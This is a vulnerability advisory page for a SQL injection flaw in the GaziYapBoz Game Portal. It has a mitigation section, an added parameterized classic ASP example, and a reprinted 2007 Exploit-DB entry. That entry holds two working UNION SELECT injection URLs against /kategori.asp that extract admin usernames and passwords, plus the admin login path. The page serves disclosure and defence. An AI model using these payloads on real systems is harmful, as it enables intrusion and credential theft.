vendor: GaziYapBoz Game Portal
by: CyberGhost
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: GaziYapBoz Game Portal
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

GaziYapBoz Game Portal Remote SQL Injection Vulnerability

The GaziYapBoz Game Portal is vulnerable to remote SQL injection. By injecting SQL into request parameters (the advisory below uses the kategori parameter of /kategori.asp), an attacker can retrieve sensitive information from the database, including the name and password columns of the admin table.

Mitigation:

To mitigate the vulnerability, the developer should use prepared statements or parameterized queries to handle user input and avoid concatenating user-supplied data into SQL queries.
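
As an added example (not code from the portal or from the advisory), here is how the kategori lookup could be rewritten in classic ASP with a parameterized ADODB.Command. The table and column names (oyunlar, id, baslik, kategori), the Application("ConnStr") connection string, the 50-character limit and the shape of the original concatenated query are assumptions, since the page does not show the portal's source.

```vbscript
<%
Option Explicit
' Added example: hardened category lookup for kategori.asp.
' Assumed names: table oyunlar, columns id/baslik/kategori,
' Application("ConnStr"), MAX_KATEGORI_LEN.

' ADO constants (values as defined in adovbs.inc)
Const adCmdText = 1
Const adParamInput = 1
Const adVarWChar = 202
Const MAX_KATEGORI_LEN = 50

Dim kategori, conn, cmd, rs
kategori = Trim(Request.QueryString("kategori"))

' Reject empty or oversized input before touching the database.
If Len(kategori) = 0 Or Len(kategori) > MAX_KATEGORI_LEN Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnStr")

' Assumed shape of the vulnerable code (input concatenated into SQL):
'   sql = "SELECT * FROM oyunlar WHERE kategori = '" & kategori & "'"
'   Set rs = conn.Execute(sql)

' Hardened form: the value travels as a bound parameter, so quotes and
' UNION keywords in it are compared as data and never parsed as SQL.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT id, baslik FROM oyunlar WHERE kategori = ?"
cmd.Parameters.Append cmd.CreateParameter("kategori", adVarWChar, _
    adParamInput, MAX_KATEGORI_LEN, kategori)

Set rs = cmd.Execute
Do Until rs.EOF
    ' Encode on output so stored values cannot inject markup.
    Response.Write Server.HTMLEncode(rs("baslik") & "") & "<br>"
    rs.MoveNext
Loop

rs.Close : conn.Close
Set rs = Nothing : Set cmd = Nothing : Set conn = Nothing
%>
```

Selecting named columns instead of * also means a later schema change cannot silently expose extra fields on this page.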

Exploit-DB raw data:

#Title  : GaziYapBoz Game Portal Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://ucgenportal.somee.com/scriptler/gaziyapboz
#Download : http://www.aspindir.com/indir.asp?id=4765&sIslem=%DDndir

Vuln.

Username : /kategori.asp?kategori='+union+select+0,1,2,3,name,5,6,7,8,9+from+admin
Password : /kategori.asp?kategori='+union+select+0,1,2,3,password,5,6,7,8,9+from+admin

Login : /personelgirisizni.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - by_emR3 - kerem125 - Bolivar - Voltigore - CyberDefacer - ProfeSSionaL

And All TURKISH HACKERS

# milw0rm.com [2007-03-08]